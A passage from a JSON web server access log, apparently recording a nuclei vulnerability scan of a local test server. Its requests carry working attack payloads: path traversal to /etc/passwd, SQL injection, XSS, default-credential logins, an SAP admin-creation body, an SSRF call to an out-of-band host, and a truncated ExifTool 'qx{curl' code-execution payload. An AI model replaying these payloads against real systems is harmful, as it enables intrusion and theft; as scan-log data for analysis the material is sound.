HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22name\x22:\x2229N5EjIFHNb713sEsEj4S3XNwzC\x22,\x22basepath\x22:\x22\x22,\x22group_id\x22:\x22{{group_id}}\x22,\x22icon\x22:\x22code-o\x22,\x22color\x22:\x22cyan\x22,\x22project_type\x22:\x22private\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/project/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22userName\x22:\x22engineer\x22,\x22password\x22:\x22engineer\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\x0D\x0A CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\x0D\x0AuserDetails","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"\x0D\x0A{\x0D\x0A \x22type\x22:\x22EXEC\x22,\x0D\x0A \x22mbean\x22:\x22com.sun.management:type=HotSpotDiagnostic\x22,\x0D\x0A \x22operation\x22:\x22dumpHeap\x22,\x0D\x0A \x22arguments\x22:[\x0D\x0A \x22/tmp1234/test1.hprof\x22,\x0D\x0A 0\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22userName\x22:\x22guest\x22,\x22password\x22:\x22guest\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22methodInput\x22:[{\x22type\x22:\x22ClusterComputeResource\x22,\x22value\x22: null,\x22serverGuid\x22: null}]}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://ca2tuc8smpv1g2s80ca0e7eximfwt6qfi.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager?type=Files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/backend/auth/signin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.jpg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0AAT&TFORM\x00\x00\x03\xAFDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99 !\xC8\x91N\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8k\xE6D\x0F,q\x02\xEEI\xD3n\x95\xBD\xA2\xC3\x22?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0Fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB17\xD9\x7F*\x89\x00BG44\x00\x00\x00\x04\x01\x0F\xF9\x9FBG44\x00\x00\x00\x02\x02\x0AFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0A\x09(Copyright \x22\x5C\x0A\x22 . qx{curl 